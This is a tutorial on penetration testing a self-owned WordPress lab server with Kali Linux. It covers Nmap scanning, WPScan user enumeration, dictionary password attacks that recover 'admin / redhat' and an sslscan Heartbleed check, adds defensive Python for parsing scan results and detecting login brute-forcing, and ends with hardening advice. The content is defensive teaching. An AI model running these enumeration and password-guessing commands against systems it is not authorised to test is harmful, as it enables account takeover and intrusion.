Find and neutralize: penetration testing with Kali Linux
Kali Linux and similar tools help you detect vulnerabilities in your software, and it is better that you find them first, not the intruders.
The truth always comes out: out of ignorance (and in some cases deliberately) even large corporations leave holes in their security. It is vital to (1) find and (2) fix them as quickly as possible. Fortunately, there are many products that help with the first step, among them Kali, a Linux distribution designed for security testing. In this article I will show how to use Kali Linux to examine your own system and find its weaknesses by simulating an attacker.
The Kali distribution bundles many tools, all of them open source. Install the distribution and all of them are available out of the box.
Picture: Peter Gervase, CC BY-SA 4.0
I will use two systems as test subjects:
- kali.usersys.redhat.com: 30 GB of memory and 6 virtual CPUs. This system (system 1) scans the victim and launches the attacks.
- vulnerable.usersys.redhat.com: a system running Red Hat Enterprise Linux 8. This is the target (system 2).
I mention the hardware specifications for a reason: some of the tasks are quite demanding, especially on the CPU of system 2 when the WordPress security scanner (WPScan) is running.
Search for open ports
I started with a basic scan of system 2. By scanning it with Nmap, you find out which ports and services are visible from system 1, the system running the scan.
Picture: Peter Gervase, CC BY-SA 4.0
So, the first thing to do is to look for "interesting" open ports, the potential weak points. In fact, any open port is interesting, because each one raises the odds of compromising the network. In this example, 21, 22, 80 and 443 are also the ports of frequently used services. For now, though, I am only doing reconnaissance and trying to gather as much information as possible about the system I want to break into.
Next, for a deeper look, I pick port 80 and run Nmap with the -p 80 and -A arguments, which reports the operating system and the application listening on port 80.
Picture: Peter Gervase, CC BY-SA 4.0
Here the lines of interest are:
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-generator: WordPress 5.6.1
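Knowing which ports are open, and which ones should be, is the first defensive check, and the recommendations at the end of this article come back to it. As an added example that is not part of the original article, here is a small Python parser for Nmap's normal output: it extracts the open ports, the service versions and the NSE script results (the same fields an attacker fingerprints), and diffs the open ports against a baseline of ports the owner expects. The scan text, hostname, addresses and the baseline are constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample, modelled on the Nmap output shown in the article
# (hostname and addresses are placeholders, not the article's systems).
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 20:48 EST
Nmap scan report for target.example.test (192.0.2.10)
Host is up (0.00015s latency).
Not shown: 993 closed ports
PORT     STATE    SERVICE    VERSION
21/tcp   open     ftp        vsftpd 3.0.3
22/tcp   open     ssh        OpenSSH 8.0 (protocol 2.0)
80/tcp   open     http       Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-server-header: Apache/2.4.37 (Red Hat Enterprise Linux)
|_http-generator: WordPress 5.6.1
111/tcp  open     rpcbind    2-4 (RPC #100000)
443/tcp  open     ssl/http   Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
3306/tcp open     mysql      MySQL 5.5.5-10.3.27-MariaDB
8080/tcp filtered http-proxy
MAC Address: 52:54:00:00:00:01 (QEMU virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds
"""

# "<port>/<proto> <state> <service> [<version ...>]"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
# NSE script output belongs to the port line above it: "| key: value" / "|_key: value"
SCRIPT_LINE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")


@dataclass
class PortFinding:
    port: int
    proto: str
    state: str
    service: str
    version: str
    scripts: dict = field(default_factory=dict)


def parse_nmap(text):
    """Parse Nmap's normal output into one PortFinding per port line."""
    findings = []
    current = None
    for line in text.splitlines():
        m = PORT_LINE.match(line.rstrip())
        if m:
            port, proto, state, service, version = m.groups()
            current = PortFinding(int(port), proto, state, service, (version or "").strip())
            findings.append(current)
            continue
        m = SCRIPT_LINE.match(line)
        if m and current is not None:
            current.scripts[m.group(1)] = m.group(2).strip()
    return findings


def open_ports(findings):
    return {(f.port, f.proto) for f in findings if f.state == "open"}


def check_baseline(findings, expected):
    """Diff the open ports against the set the owner says should be open."""
    found = open_ports(findings)
    return {"unexpected": sorted(found - expected), "missing": sorted(expected - found)}


def disclosed_versions(findings):
    """Open services that hand out a product/version string or script result."""
    report = {}
    for f in findings:
        if f.state != "open":
            continue
        details = [f.version] if f.version else []
        details += [f"{k}: {v}" for k, v in f.scripts.items()]
        if details:
            report[f"{f.port}/{f.proto}"] = details
    return report


if __name__ == "__main__":
    findings = parse_nmap(SAMPLE_NMAP_OUTPUT)
    baseline = {(22, "tcp"), (80, "tcp"), (443, "tcp")}  # assumed: what should be open
    diff = check_baseline(findings, baseline)
    print("unexpected open ports:", diff["unexpected"])
    print("expected but not open:", diff["missing"])
    for port, details in disclosed_versions(findings).items():
        print(port, "->", "; ".join(details))
```

Feed it the saved output of `nmap -sV` (or `-A`) against your own host and keep the baseline in version control: anything in `unexpected` is either a service you forgot about or a change worth investigating, and `disclosed_versions` is the list of banners you may want to trim or patch.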
Finding information about users
Since I now know this is a WordPress server, I can use WPScan to look for potential vulnerabilities. It would be nice to find some usernames and their passwords. To enumerate the users of a given WordPress instance, use the --enumerate u option:
┌──(root💀kali)-[~]
└─# wpscan --url vulnerable.usersys.redhat.com --enumerate u
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]
[+] Started: Tue Feb 16 21:38:49 2021
Interesting Finding(s):
...
[i] User(s) Identified:
[+] admin
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
[+] pgervase
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)
Two users found: admin and pgervase. I will try to guess the admin password with a dictionary attack, using password dictionaries (text files of candidate passwords). I will use dictionaries of 3,231 and 3,543,076,137 lines.
Password guessing with dictionary attack
Various tools can be used for dictionary attacks. Here are two example commands with Nmap and WPScan:
# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=/path/to/passworddb,threads=6 vulnerable.usersys.redhat.com
# wpscan --url vulnerable.usersys.redhat.com --passwords /path/to/passworddb --usernames admin --max-threads 50 | tee nmap.txt
Both tools can of course do much more, but they are also suitable for password guessing.
This WPScan command, for example, prints the password at the end of its output:
┌──(root💀kali)-[~]
└─# wpscan --url vulnerable.usersys.redhat.com --passwords passwords.txt --usernames admin
_______________________________________________________________
WordPress Security Scanner by the WPScan Team
Version 3.8.10
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]
[+] Started: Thu Feb 18 20:32:13 2021
Interesting Finding(s):
...
[+] Performing password attack on Wp Login against 1 user/s
Trying admin / redhat Time: 00:01:57 <==============================> (3231 / 3231) 100.00% Time: 00:01:57
Trying admin / redhat Time: 00:01:57 <===============               > (3231 / 6462)  50.00% ETA: ??:??:??
[SUCCESS] - admin / redhat
[!] Valid Combinations Found:
 | Username: admin, Password: redhat
The Valid Combinations Found section at the end contains the admin username and its password. Iterating over 3,231 lines took only two minutes.
I have another dictionary file with 3,238,659,984 unique entries, which will take much longer.
Nmap produces a result much faster:
┌──(root💀kali)-[~]
└─# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=password.txt,threads=6 vulnerable.usersys.redhat.com
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 20:48 EST
Nmap scan report for vulnerable.usersys.redhat.com (10.19.47.242)
Host is up (0.00015s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
22/tcp   open  ssh     OpenSSH 8.0 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
|_http-server-header: Apache/2.4.37 (Red Hat Enterprise Linux)
| http-wordpress-brute:
|   Accounts:
|     admin:redhat - Valid credentials      <<<<<<<
|     pgervase:redhat - Valid credentials   <<<<<<<
|_  Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
111/tcp  open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
3306/tcp open  mysql   MySQL 5.5.5-10.3.27-MariaDB
MAC Address: 52:54:00:8C:A1:C0 (QEMU virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds
Such a scan does leave traces, though: the HTTPD logs on the targeted system record every attempt:
10.19.47.170 - - [18/Feb/2021:20:14:01 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://vulnerable.usersys.redhat.com/" "WPScan v3.8.10 (https://wpscan.org/)"
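The log excerpt above is what the defender actually has to work with, and the advice at the end of this article to check your logs comes down to spotting exactly this pattern. As an added example (not code from the original article), here is a small Python detector that parses Apache combined-format access log lines and flags a source address that either announces itself with a scanner user-agent or piles up failed POSTs to wp-login.php inside a sliding time window. The log lines, addresses and hostname below are constructed, and the threshold of 5 attempts in 60 seconds is an assumption to tune for your site.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in Apache "combined" log format, modelled on the excerpt
# above. Addresses and hostname are documentation-range placeholders.
SAMPLE_ACCESS_LOG = """\
192.0.2.44 - - [18/Feb/2021:20:13:55 -0500] "GET / HTTP/1.1" 200 10412 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/85.0"
192.0.2.44 - - [18/Feb/2021:20:13:58 -0500] "POST /wp-login.php HTTP/1.1" 302 0 "http://blog.example.test/wp-login.php" "Mozilla/5.0 (X11; Linux x86_64) Firefox/85.0"
198.51.100.7 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://blog.example.test/" "WPScan v3.8.10 (https://wpscan.org/)"
198.51.100.7 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://blog.example.test/" "WPScan v3.8.10 (https://wpscan.org/)"
198.51.100.7 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://blog.example.test/" "WPScan v3.8.10 (https://wpscan.org/)"
198.51.100.7 - - [18/Feb/2021:20:14:01 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://blog.example.test/" "WPScan v3.8.10 (https://wpscan.org/)"
198.51.100.7 - - [18/Feb/2021:20:14:01 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://blog.example.test/" "WPScan v3.8.10 (https://wpscan.org/)"
198.51.100.7 - - [18/Feb/2021:20:14:01 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://blog.example.test/" "WPScan v3.8.10 (https://wpscan.org/)"
198.51.100.7 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://blog.example.test/" "WPScan v3.8.10 (https://wpscan.org/)"
198.51.100.7 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://blog.example.test/" "WPScan v3.8.10 (https://wpscan.org/)"
198.51.100.7 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "http://blog.example.test/" "WPScan v3.8.10 (https://wpscan.org/)"
203.0.113.9 - - [18/Feb/2021:20:20:10 -0500] "GET /wp-login.php HTTP/1.1" 200 7575 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/88.0"
"""

# ip ident user [timestamp] "METHOD path proto" status bytes "referer" "user-agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# User-agent fragments of the scanners used in the article: WPScan names itself,
# and Nmap's NSE default agent contains "Nmap Scripting Engine".
SCANNER_AGENT_MARKERS = ("wpscan", "nmap scripting engine")


def parse_access_log(text):
    """Parse combined-format lines; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%d/%b/%Y:%H:%M:%S %z")
        ev["status"] = int(ev["status"])
        events.append(ev)
    return events


def is_failed_login(ev):
    # WordPress re-renders the login form with HTTP 200 after a failed login and
    # answers a successful one with a 302 redirect, so POST + 200 is a failure.
    return (ev["method"] == "POST"
            and ev["path"].split("?")[0] == "/wp-login.php"
            and ev["status"] == 200)


def detect_bruteforce(events, threshold=5, window=timedelta(seconds=60)):
    """Flag IPs with >= threshold failed logins inside a sliding window, or a
    known scanner user-agent. Returns one alert dict per flagged IP."""
    recent = defaultdict(deque)   # ip -> timestamps of recent failed logins
    failures = defaultdict(int)   # ip -> total failed logins seen so far
    alerts = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        ip = ev["ip"]
        scanner = any(mark in ev["agent"].lower() for mark in SCANNER_AGENT_MARKERS)
        burst = 0
        if is_failed_login(ev):
            failures[ip] += 1
            q = recent[ip]
            q.append(ev["ts"])
            while ev["ts"] - q[0] > window:   # drop attempts older than the window
                q.popleft()
            burst = len(q)
        if scanner or burst >= threshold:
            a = alerts.setdefault(ip, {"ip": ip, "first": ev["ts"], "last": ev["ts"],
                                       "failed_logins": 0, "peak_in_window": 0,
                                       "scanner_agent": False})
            a["last"] = ev["ts"]
            a["scanner_agent"] = a["scanner_agent"] or scanner
            a["failed_logins"] = failures[ip]
            a["peak_in_window"] = max(a["peak_in_window"], burst)
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_bruteforce(parse_access_log(SAMPLE_ACCESS_LOG)):
        print(f'{alert["ip"]}: {alert["failed_logins"]} failed logins '
              f'(peak {alert["peak_in_window"]} in window), '
              f'scanner agent: {alert["scanner_agent"]}, '
              f'{alert["first"]:%H:%M:%S} - {alert["last"]:%H:%M:%S}')
```

The user-agent check catches the noisy default configuration of the tools shown above, but a determined attacker sets a browser-like agent, so the failed-login burst is the signal to rely on; the same counter is what a lockout rule on the login form would use, which is the "limit the number of login attempts" recommendation in practice.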
Search for Heartbleed Vulnerability
To get information about the HTTPS server and its SSL/TLS configuration, I use the sslscan command:
┌──(rootkali)-[~]
└─# sslscan vulnerable.usersys.redhat.com
Version: 2.0.6-static
OpenSSL 1.1.1i-dev xx XXX xxxx
Connected to 10.19.47.242
Testing SSL server vulnerable.usersys.redhat.com on port 443 using SNI name vulnerable.usersys.redhat.com
SSL/TLS Protocols:
SSLv2 disabled
SSLv3 disabled
TLSv1.0 disabled
TLSv1.1 disabled
TLSv1.2 enabled
TLSv1.3 enabled
<snip>
We see that none of the protocol versions enabled on the server is vulnerable to Heartbleed:
Heartbleed:
TLSv1.3 not vulnerable to heartbleed
TLSv1.2 not vulnerable to heartbleed
This means I cannot read the server's memory and data through the TLS Heartbeat extension. Well, no luck this time 🙂
Hacking Prevention and Protection Tips
Many articles could be written on how to resist attackers of all stripes. Here I will limit myself to general recommendations:
- Study your system: which ports are open, which ports should be open, who should be able to see them and how much traffic should go through them. Nmap will help you here.
- Follow current best practices: what counts as good practice today will not be good practice forever, so keep up with the latest developments in information security.
- Configure your products and their environment wisely: for example, instead of letting an attacker hammer your WordPress login indefinitely, limit the number of login attempts and block the offending IP address. Blocking an address alone is often of little use, since attackers can switch to other addresses, but the setting is easy to enable and will repel at least some attacks.
- Create and maintain good backups: if an attacker breaks into one or more of your systems, being able to restore the data without heroic effort will save you a lot of time and money.
- Check your logs: as the examples above show, scans and other intrusion attempts leave plenty of log entries. If you spot them in time, you still have time to protect yourself.
- Update your system, your applications and any add-on modules: specialists at the US National Institute of Standards and Technology (NIST) are confident that "updates are usually the most effective way to fix vulnerabilities and can often be the only truly effective solution."
- Use the additional tools your software vendors offer: for example, a Red Hat Enterprise Linux subscription includes Red Hat Insights, a tool that helps you configure your system and warns you about potential security threats in good time.
Useful materials (in English)
What is described in this article is just the tip of the iceberg. To dive deeper, you can explore the following resources: